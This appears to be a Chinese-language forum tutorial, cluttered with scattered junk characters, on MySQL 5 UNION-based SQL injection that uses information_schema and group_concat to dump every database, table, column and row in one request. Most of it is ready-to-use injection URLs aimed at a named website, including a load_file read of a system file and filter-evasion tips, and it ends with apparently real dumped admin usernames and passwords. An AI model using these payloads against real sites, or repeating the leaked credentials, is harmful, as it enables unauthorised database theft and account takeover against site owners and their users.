此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
* q* T/ H- Z [但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人8 P: X% e1 X6 H' ~ d
: l1 K7 q& k7 l6 x& Z% a6 H' o
0 a2 D* A& p( h) `6 k优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入( Q3 E4 V" p8 {" @1 R. v
. ^; A. F5 U' M* g; S$ M5 g. [/ t
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
) [3 t( t5 U: u2 A2 K
/ Y) \$ }; G" ?4 X% K5 t O: U下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示) H! E! | x. E) i) y3 S0 ^
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
3 {3 q! @3 v6 J$ l, D. V, W" C0 { S; b1 V6 ?) d- u
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
+ z+ T: a6 M2 |( Y+ n$ F+ d# `$ l9 [+ P9 K1 F: Y. P1 U0 F
读出所有库:4 h& C% K- a$ G- p) Q7 b! S- B
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
3 U8 W, b5 l! |& p& r2 D- r* c- D
' Y1 \" M9 W/ [0 q$ v! k; o: ?( S
5 } b- ?* A5 V1 \
读出所有表:8 F0 t( N, J, [2 t) g# }
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
( b, o- j3 f$ w# X7 z+ D0 O6 T0 [0 k( b
读出所有表字段:
9 E; |& G! s. _2 ]5 Mhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
; @3 \+ ~8 p* h, u9 Z% n*/ (97,100,109,105,110)为admin的ascii码 依次类推
! @4 {6 p/ J- y: a" A1 w# l& y. y
% \) L4 D3 ~& {! b# T* G读出所有表字段里的内容:
' G% |8 {1 ^* J B1 Lhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin0 S9 \/ n/ W6 y, W1 F( c
& `9 S# l6 I+ x4 P
! l# m& s/ m: ^+ b" I+ r5 w) F6 j G8 R0 C# g% A' W, Z
+ p$ Q& I9 C' k
5 V! H5 t- b$ T8 o9 Z; W
6 R; J: R: v3 x; ehttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
% s5 ~# g5 }, R( n- Z) G8 W- s8 H. v2 m1 j6 l
4 l* {6 T1 M0 i* R) ihttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23& `+ x9 V$ E& s
0 x. s. V! k( t( p; e
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
6 |' j( B4 ]+ g/ E
$ {: t, |% ^( R7 |, I. O
+ u5 G6 k5 [; s1 e( T+ j1 E3 Ihttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
" @, o( R4 X( r7 \: A) R* {
# J( Q' N- k3 Y2 u" \* m- T6 R* }" m3 n, A( _$ v/ ~' l
webmaster:dzb521123,simlab:simadmin200432334 ?. |# B2 S/ p2 F/ M
|